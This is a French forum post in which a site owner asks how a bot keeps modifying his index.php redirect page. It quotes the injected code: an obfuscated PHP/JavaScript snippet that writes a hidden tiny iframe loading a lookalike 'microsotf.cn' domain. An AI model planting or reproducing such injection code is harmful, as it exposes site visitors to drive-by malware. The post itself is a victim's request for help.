Modification des pages web par un robot
Posté : 04 juil. 2009, 23:04
Salut,
Un truc bizarre depuis quelque temsp sur mon site, j'ai une page index qui redirige vers un répertoire, et depuis deux jours un robot arrive à modifier ma page index en y ajoutant ceci
Le contenu de ma page index.php
Un truc bizarre depuis quelque temsp sur mon site, j'ai une page index qui redirige vers un répertoire, et depuis deux jours un robot arrive à modifier ma page index en y ajoutant ceci
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
Alors ma question comment cela est t'il possible Le contenu de ma page index.php
<?php
header("Status: 301 Moved Permanently");
header("Location: http://www.dunbar.be/le repertoire/");
exit();
?>